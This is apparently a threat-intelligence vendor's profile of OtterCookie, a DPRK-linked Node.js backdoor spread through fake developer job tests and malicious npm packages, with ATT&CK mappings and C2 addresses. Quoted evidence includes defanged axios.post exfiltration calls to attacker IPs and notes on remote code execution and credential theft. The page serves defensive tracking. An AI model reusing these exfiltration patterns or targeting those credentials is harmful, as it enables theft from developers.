Skip to main content
Meet us at Black Hat USA 2026— Las Vegas, August 1–6Book a Meeting
Mallory
Back to malware
MalwareRansomwareUsed by 10 actors

OtterCookie

OtterCookie is a JavaScript/Node.js malware family used in DPRK-linked developer-targeting operations associated with Contagious Interview and overlapping clusters tracked as Lazarus, Famous Chollima, PurpleBravo, WageMole, and DeceptiveDevelopment. The content consistently describes it as a backdoor/RAT with infostealing functionality, distinct from BeaverTail and often used alongside BeaverTail and InvisibleFerret in phased infection chains targeting software developers, especially Web3, DeFi, AI, and cryptocurrency-related personnel.

Observed delivery vectors include trojanized coding challenges and repositories delivered through fake job offers, malicious GitHub and Bitbucket projects, Google Docs lures, trojanized open-source software such as a 3D chess project, and malicious npm packages including gemini-ai-checker, express-flowlimit, chai-extensions-extras, and broader late-2025 npm waves. Related reporting also ties OtterCookie-linked infrastructure patterns to malicious packages such as chai-as-init and other dependency-chain campaigns.

Functionally, OtterCookie is described as a live-surveillance implant that continuously collects data from active developer workstations rather than performing only a one-time sweep. Reported capabilities include clipboard theft, keystroke logging, screenshot capture, monitoring the active workspace on a 30-second interval, browser secret theft, developer credential theft, cryptocurrency wallet artifact theft, shell command execution, victim data exfiltration, and persistent command-and-control. Some reporting characterizes it as a Socket.IO-based backdoor that maintains a live roster of connected victims.

Its command-and-control is repeatedly described as using Socket.IO over Engine.IO v4. Infrastructure observed in the content includes Hetzner-hosted server 195.201.104.53, where port 6931 functioned as a live OtterCookie Socket.IO C2 broadcasting victim state every 30 seconds and port 6101 appeared to be an older predecessor C2. Additional reporting cites IP address 216.126.225.243 as a known DPRK OtterCookie C2, with one analyzed Node.js stealer sample using that IP on ports 8085, 8086, and 8087 for browser-data theft, file exfiltration, and reverse-shell/C2 traffic. Vercel-hosted staging and infrastructure patterns, including tetrismic.vercel.app and ipcheck-themed Vercel paths, are also associated with OtterCookie-related activity in the provided content.

The malware is primarily associated with campaigns targeting developers globally through fraudulent recruiting workflows, especially in the cryptocurrency sector. Multiple sources in the content state that BeaverTail, OtterCookie, and InvisibleFerret are used together in infection chains that begin with fake interviews or coding assessments and culminate in credential theft, wallet theft, and broader compromise.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
THREAT ACTORS

Groups observed using it

10 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
WageMole

This will eventually to either Ottercookie / Beavertail malware. Running the entire repository ultimately leads to an infection.

via medium meeswicky1100medium.com
Lazarus

The campaign used the JavaScript infostealer BeaverTail, the cross-platform Python backdoor InvisibleFerret, and most recently OtterCookie, a new backdoor identified in December 2024.

via recorded future blogrecordedfuture.com
Contagious Interview

The campaign used the JavaScript infostealer BeaverTail, the cross-platform Python backdoor InvisibleFerret, and most recently OtterCookie, a new backdoor identified in December 2024.

via recorded future blogrecordedfuture.com
CL-STA-0240

The campaign used the JavaScript infostealer BeaverTail, the cross-platform Python backdoor InvisibleFerret, and most recently OtterCookie, a new backdoor identified in December 2024.

via recorded future blogrecordedfuture.com
TraderTraitor

The campaign targeted Web3 and decentralised finance (DeFi) developers globally via AI-generated fake job offers delivered through LinkedIn, using three interoperating malware families BeaverTail, OtterCookie, and InvisibleFerret in a phased infection chain that begins with a malicious coding assessment and culminates in full credential exfiltration and wallet drainage.

via falconfeeds blogfalconfeeds.io
HexagonalRodent

The campaign targeted Web3 and decentralised finance (DeFi) developers globally via AI-generated fake job offers delivered through LinkedIn, using three interoperating malware families BeaverTail, OtterCookie, and InvisibleFerret in a phased infection chain that begins with a malicious coding assessment and culminates in full credential exfiltration and wallet drainage.

via falconfeeds blogfalconfeeds.io
+4 more in the app
MITRE ATT&CK

Techniques & procedures

28 distinct techniques documented for this family, organized by ATT&CK tactic.

Resource Development

1 technique
T1583.001DomainsEvidence1

chai-as-init 패키지는 인기 패키지인 chai 및 chai-as-promised 패키지명을 모방한 타이포스쿼팅 (Typosquatting)기법을 사용

Initial Access

3 techniques
T1189Drive-by CompromiseEvidence2

With the unique fingerprint, we identified 77 malicious GitHub repositories... Running the entire repository ultimately leads to an infection.

T1195Supply Chain CompromiseEvidence2

유명 테스트 프레임워크인 Chai.js의 플러그인으로 위장한 악성 npm 패키지(chai-as-init)가 v1.4.5 ~ v1.4.7까지 총 3개 버전으로 배포

T1566.003Spearphishing via ServiceEvidence2

FAMOUS CHOLLIMA uses Google Docs to advertise fake jobs to steal data from developers... There are multiple tabs but they all lead to the same link: A Google Doc titled "Test Requirement", which details a coding test an interviewee must complete.

Execution

4 techniques
T1059Command and Scripting InterpreterEvidence4

This will eventually to either Ottercookie / Beavertail malware. Running the entire repository ultimately leads to an infection.

T1059.007JavaScriptEvidence1

패키지를 불러오는 즉시 외부 서버에서 악성 코드를 내려받아 실행하며... new Function() 으로 원격 코드를 실행

T1204.001Malicious LinkEvidence1

The repository it links to has long been taken down, but it would have triggered a multi-stage infection chain leading to infostealing malware like OtterCookie or InvisibleFerrett.

T1204.002Malicious FileEvidence1

Running the entire repository ultimately leads to an infection.

Persistence

2 techniques
T1176Software ExtensionsEvidence1

Five trojanized browser extensions – Bitwarden, Phantom, TronLink, Trust Wallet, and a Brave/MetaMask-themed trojan – share a single boot sequence.

T1547Boot or Logon Autostart ExecutionEvidence1

macOS persistence pair from Part III: Login Items entry plus a per-user LaunchAgent referencing a Node process

Privilege Escalation

1 technique
T1547Boot or Logon Autostart ExecutionEvidence1

macOS persistence pair from Part III: Login Items entry plus a per-user LaunchAgent referencing a Node process

Stealth

2 techniques
T1027Obfuscated Files or InformationEvidence3

By leveraging an advanced search pivot on GitHub that only discovers the encoded string for hxxps[:]//api-server-mocha[.]vercel[.]app... Where the decoded value is AUTH_AIP_KEY

T1564.003Hidden WindowEvidence1

자식 프로세스를 부모와 분리( detached )하고 출력을 숨기며( stdio: 'ignore' ), 부모가 종료되어도 살아남도록( child.unref() ) 설정

Credential Access

6 techniques
T1056Input CaptureEvidence1

OtterCookie was reading clipboard contents, capturing keystrokes, taking screenshots, watching the active workspace on a thirty-second clock.

T1528Steal Application Access TokenEvidence1

Collection class Behavior Developer secrets .env files, SSH material, cloud credentials, source-control tokens, and adjacent on-disk secrets.

T1539Steal Web Session CookieEvidence1

Collection class Behavior Browser data Credential and cookie theft consistent with the broader Contagious Interview campaign.

T1552Unsecured CredentialsEvidence1

Collection class Behavior Developer secrets .env files, SSH material, cloud credentials, source-control tokens, and adjacent on-disk secrets.

T1555Credentials from Password StoresEvidence2

The first one is a browser credential stealer. It supports: Chrome, Brave, Edge, Opera, Opera GX, Vivaldi, Kiwi, Yandex, Iridium, Comodo Dragon, SRWare Iron, Chromium, AVG Browser.

T1649Steal or Forge Authentication CertificatesEvidence3

환경변수와 함께 즉시 탈취하는 정보에는 다음과 같은 고위험 자격증명이 포함됩니다... AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN, NPM_TOKEN

Discovery

2 techniques
T1082System Information DiscoveryEvidence2

os.hostname() 으로 호스트명, os.type() 과 os.release() 로 OS 종류·버전, os.userInfo() 로 사용자명을 수집

T1083File and Directory DiscoveryEvidence1

fs.readdirSync() 로 특정 4개 디렉터리를 제외한 채 재귀적으로 파일 목록을 수집

Collection

4 techniques
T1005Data from Local SystemEvidence3

OtterCookie is capable of identifying cryptocurrency assets and sensitive information found in specific file types by using regex patterns, including executables, photos, and config and env files, among others.

T1056Input CaptureEvidence1

OtterCookie was reading clipboard contents, capturing keystrokes, taking screenshots, watching the active workspace on a thirty-second clock.

T1113Screen CaptureEvidence2

OtterCookie was reading clipboard contents, capturing keystrokes, taking screenshots, watching the active workspace on a thirty-second clock.

T1115Clipboard DataEvidence2

OtterCookie was reading clipboard contents, capturing keystrokes, taking screenshots, watching the active workspace on a thirty-second clock.

Command and Control

4 techniques
T1071Application Layer ProtocolEvidence4

InvisibleFerret introduces additional malicious payloads into victim environments, performs information stealing and fingerprinting actions within the victim environment, and leverages legitimate protocols and software for C2 communications.

T1071.001Web ProtocolsEvidence2

All HTTP communications are performed via the Axios NPM package... const response = await axios.post(`hxxp://216[.]126[.]225[.]243:8086/upload`, form... Upon the first connection the following info is sent to the C2 via a POST request to hxxp://216[.]126[.]225[.]243:8087/api/notify

T1102.001Dead Drop ResolverEvidence1

Each extension reads it from a transaction payload on an Aptos mainnet account ... at runtime. ... The first thing each of the five extensions does on load is ask a public blockchain where its server is.

T1105Ingress Tool TransferEvidence1

2단계 로더( initializeCaller.js )가 C2 서버와 통신하여 최종 페이로드를 받아 실행

Exfiltration

1 technique
T1041Exfiltration Over C2 ChannelEvidence3

axios.post로 공격자 서버(hxxp://144.172.89[.]180:8086/upload)에 전송

INDICATORS OF COMPROMISE

IOCs tracked for this family

122 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
70 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
14 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
38 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
ip.v4●●●●●●●●●●●●View more in app11 days ago
uri●●●●●●●●●●●●View more in app11 days ago
domain●●●●●●●●●●●●View more in app11 days ago
ip.v4●●●●●●●●●●●●View more in app11 days ago
uri●●●●●●●●●●●●View more in app11 days ago
uri●●●●●●●●●●●●View more in app18 days ago
ACTIVITY FEED

Recent activity

89 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

89 SOURCESView more in app
alyac blogNews
Jun 16, 2026
Chai.js 플러그인으로 위장한 북한발 npm 악성 패키지 'chai-as-init' 분석

Contagious Interview campaign malware described as an infostealer and RAT. The report says the chai-as-init package’s infrastructure pattern and TTPs align with previously identified North Korean OtterCookie infrastructure.

Read more
kmsecNews
Jun 10, 2026
Hunting North Korea's job adverts on Google Docs | kmsec.uk

Infostealing malware used in FAMOUS CHOLLIMA's Contagious Interview campaign to steal data and drain cryptocurrency wallets from targeted developers.

Read more
scworldNews
Jun 9, 2026
Suspected North Korean actors use fake ‘coding assignments’ to steal crypto | news | SC Media

Named as malware previously used by the Contagious Interview campaign; no further technical details are provided in the content.

Read more
proofpointNews
Jun 5, 2026
Don't Fear the Repo: UNK_DeadDrop Phishing Campaign Targets Developers to Steal Cryptocurrency | Proofpoint US

A JavaScript malware payload referenced as part of Contagious Interview activity in the comparison table.

Read more
+85 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching122

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution10

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping28

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.